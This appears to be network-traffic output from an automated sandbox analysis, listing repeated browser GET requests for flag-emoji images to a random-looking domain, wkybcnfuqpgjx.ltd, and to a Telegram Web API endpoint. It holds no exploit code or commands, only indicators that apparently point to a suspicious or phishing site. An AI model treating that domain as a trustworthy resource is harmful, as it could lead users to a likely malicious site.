Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1fb-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1fb-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1fb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f9-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1fb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f0-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1f9-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f0.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e8-1f1f3.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
